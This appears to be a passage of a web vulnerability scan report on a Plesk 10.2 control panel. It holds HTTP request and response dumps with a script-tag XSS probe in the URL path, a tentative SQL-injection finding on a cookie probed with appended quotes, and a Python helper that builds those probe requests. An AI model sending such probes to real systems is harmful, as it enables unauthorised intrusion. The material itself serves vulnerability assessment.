<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E?1''=1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; no_frames=deleted;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:37:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:37:03 GMT
Connection: close
Content-Length: 15992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/admin-home.js?1302230704"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="admin-home">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/admin-home/action-name/index" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fadmin-home' + '&activeModule=' + 'adminHome' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"active","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>



<div id="content-body" class="clearfix">
<div id="main">

<div id="statPanel" class="admin-dashboard-box ad-statistics"></div>

<div id="webPanel" class="admin-dashboard-box ad-sites"></div>
<div id="mailPanel" class="admin-dashboard-box ad-mail"></div>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>

<div id="usersPanel" class="admin-dashboard-box ad-users"></div>


<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   
   



new Smb.AdminHome.Panel({
applyTo: 'usersPanel',
title: 'Users',
description: 'Create and manage user accounts and user roles. Assign installed applications to user roles.',
links: [
{title: 'User Accounts', href: '/user/list/'},
{title: 'Create User Account', href: '/user/create/'},
{title: 'User Roles', href: '/role/list/'},
{title: 'Create User Role', href: '/role/create/'}
]
,moreLink: {title: 'More', href: '/user/list/'}
});

new Smb.AdminHome.StatPanel({
applyTo: 'statPanel',
title: 'Statistics on Resource Usage',
description: 'View detailed reports on disk space and traffic usage by services and by months.',
moreLink: {title: 'More', href: '/statistics/'},
stats: [
{
    title: 'Disk space',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B used of 10.0 GB\n'
}, {
title: 'Traffic',
value: '\n \n \x3Cspan class="gauge-wrapper f9 not_empty" title=""\x3E\n \x3Cspan class="gauge-container"\x3E\n \x3Cspan class="gauge-filled" style="width: 0%;"\x3E\x3C/span\x3E\n \x3C/span\x3E\n \x3C/span\x3E\n 0 B/month used of 100 GB/month\n'
}
]
});

new Smb.AdminHome.WebSitesPanel({
applyTo: 'webPanel',
title: 'Websites &amp; Domains',
description: 'Add domain names and set up websites. Manage website content and view statistics on how people visit your websites.',
domains: {"1":{"id":1,"name":"vulnerable.host.fqdn","php":true}},
domainId: 1,
subscriptionId: "1",
locale: {
noDomains: 'No websites' },
links: [{"title":"Add Domain","href":"\/web\/add-domain\/"},{"title":"File Manager","href":"\/web\/file-manager\/id\/%%subscriptionId%%\/siteId\/%%domainId%%\/"},{"title":"Secure Your Site with SSL Certificate","href":"\/web\/proxy\/type\/ssl-certificates\/"},{"title":"Statistics","href":"\/statistics\/"}],
moreLink: {title: 'More', href: '/web/view/id/%%subscriptionId%%/'}
});


new Smb.AdminHome.Panel({
applyTo: 'mailPanel',
title: 'Mail',
description: 'Create e-mail addresses and mailing lists. Set up mail forwarding, e-mail aliases, auto-replies, and protection from spam and viruses.',
links: [
{
title: "E-mail Addresses" ,href: "\/email-address\/list\/" },
{
title: "Create E-mail Address" ,href: "\/email-address\/create\/" },
{
title: "Mailing Lists" ,href: "\/mail-list\/list\/" },
{
title: "Create Mailing List" ,href: "\/mail-list\/create\/" },
null
]
,moreLink: {"title":"More","href":"\/email-address\/"} });



new Smb.GettingStartedPopup('top-getting-started-container');
});
//]]>
</script>
</div> <!-- /main -->

<div id="secondary">

<div id="applicationsPanel" class="admin-dashboard-box ad-apps no-aps">
<div id="applicationsPanel-content-area" class="content-wrapper">
<div class="no-aps-msg">
There are no installed applications. </div>
</div>
</div>
<div class="aps-block">
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.AdminHome.Panel({
applyTo: 'applicationsPanel',
title: 'Applications',
description: 'Install apps on your websites. Assign administrative privileges to selected users.' ,
links: [
{title: 'Install Applications', href: '/app/'}
]
});





});
//]]>
</script>
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

1.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/web/%3Cscript%3Ealert(1)%3C/script%3E [no_frames_logout_page cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.plesk.control.panel.20110407.20:8880
Path:   /smb/web/%3Cscript%3Ealert(1)%3C/script%3E

Issue detail

The no_frames_logout_page cookie appears to be vulnerable to SQL injection. A single quote was appended to the cookie value (Request 1) and the application returned an error; two single quotes were then appended (Request 2) and the error disappeared. That pattern is consistent with the cookie value being placed unescaped inside an SQL string literal, but it is not proof: the error boxes visible in Response 1 carry Plesk's generic "Invalid URL was requested." message rather than a database error, which is why the confidence stays Tentative. Review the exact error message and the application's handling of other input to confirm whether a vulnerability is present.
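The two-request differential described above, reproduced as an added example (this is not XSS.CX's tooling and not Plesk code). It builds the single-quote and double-quote requests against the same cookie, pulls every Plesk error box out of each response body, and only rates the finding "probable" when the error that appears and disappears is something other than the generic URL-validation message. The two response bodies are constructed here from the message markup shown in Response 1 of this report, the cookie jar is trimmed to four of the report's cookies, and the host is the report's placeholder; nothing is sent over the network.

```python
"""Differential probe for SQL injection in a cookie value (added example)."""
import re
from html import unescape

HOST = "vulnerable.plesk.control.panel.20110407.20:8880"
PATH = "/smb/web/%3Cscript%3Ealert(1)%3C/script%3E"

# Plesk renders each message as
#   <div class="msg-box msg-error"> ... <span class="title">Error:</span> text </div>
ERROR_BOX = re.compile(
    r'<div class="msg-box msg-error">.*?<span class="title">Error:</span>(.*?)</div>',
    re.S,
)

# Messages produced by Plesk's URL/route validation, not by a database layer.
# A differential built only on these is rated "tentative", not "probable".
GENERIC_ERRORS = {"Invalid URL was requested."}

# Trimmed cookie jar taken from the report's Request 1.
BASE_COOKIES = {
    "PLESKSESSID": "66f4f3aa52eb21d7134fc0175f742f5a",
    "locale": "en-US",
    "no_frames_logout_page": "deleted",
    "psaContext": "dashboard",
}


def cookie_header(cookies, target, payload):
    """Serialise the jar with `payload` appended to the cookie named `target`."""
    return "; ".join(
        f"{name}={value + payload if name == target else value}"
        for name, value in cookies.items()
    )


def build_request(cookies, target, payload):
    """Raw GET request line plus headers, ready to paste into a repeater."""
    return (
        f"GET {PATH} HTTP/1.1\r\n"
        f"Host: {HOST}\r\n"
        f"Cookie: {cookie_header(cookies, target, payload)}\r\n\r\n"
    )


def extract_errors(body):
    """Return the text of every Plesk error box in an HTML body."""
    return [unescape(m).strip() for m in ERROR_BOX.findall(body)]


def classify(single_quote_body, double_quote_body):
    """Apply the differential: error with ' and no error with '' is suspicious.

    verdict is "no-differential", "tentative" (only generic, non-database
    messages seen) or "probable" (at least one non-generic error message).
    """
    errs_1 = extract_errors(single_quote_body)
    errs_2 = extract_errors(double_quote_body)
    differential = bool(errs_1) and not errs_2
    if not differential:
        verdict = "no-differential"
    elif all(e in GENERIC_ERRORS for e in errs_1):
        verdict = "tentative"
    else:
        verdict = "probable"
    return {
        "errors_single_quote": errs_1,
        "errors_double_quote": errs_2,
        "differential": differential,
        "verdict": verdict,
    }


# Constructed response bodies: the error markup is copied from Response 1
# above; the clean body stands in for the Response 2 the issue detail describes.
_ERROR_BOX_HTML = (
    '<div class="msg-box msg-error"><div><div><div><div><div>\n'
    '<div class="msg-content">\n'
    '<span class="title">Error:</span> Invalid URL was requested. </div>\n'
    '</div></div></div></div></div></div>\n'
)
RESPONSE_SINGLE_QUOTE = '<body class="admin-home">\n' + _ERROR_BOX_HTML * 2 + "</body>"
RESPONSE_DOUBLE_QUOTE = '<body class="admin-home">\n</body>'


def run_probe():
    """Build both requests and classify the constructed responses."""
    req_1 = build_request(BASE_COOKIES, "no_frames_logout_page", "'")
    req_2 = build_request(BASE_COOKIES, "no_frames_logout_page", "''")
    return req_1, req_2, classify(RESPONSE_SINGLE_QUOTE, RESPONSE_DOUBLE_QUOTE)


if __name__ == "__main__":
    r1, r2, res = run_probe()
    print(r1)
    print(r2)
    print(res)
```

Run against the constructed bodies the verdict is "tentative": the differential is present, but every message that appeared is the generic URL-validation error. Swap in a response whose error box carries a database message and the same differential is rated "probable"; that split is the check a practitioner wants before escalating a scanner hit on a cookie.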

Request 1

GET /smb/web/%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; advancedPanel-hidden=0; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted'; psaContext=dashboard; backupftprepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; 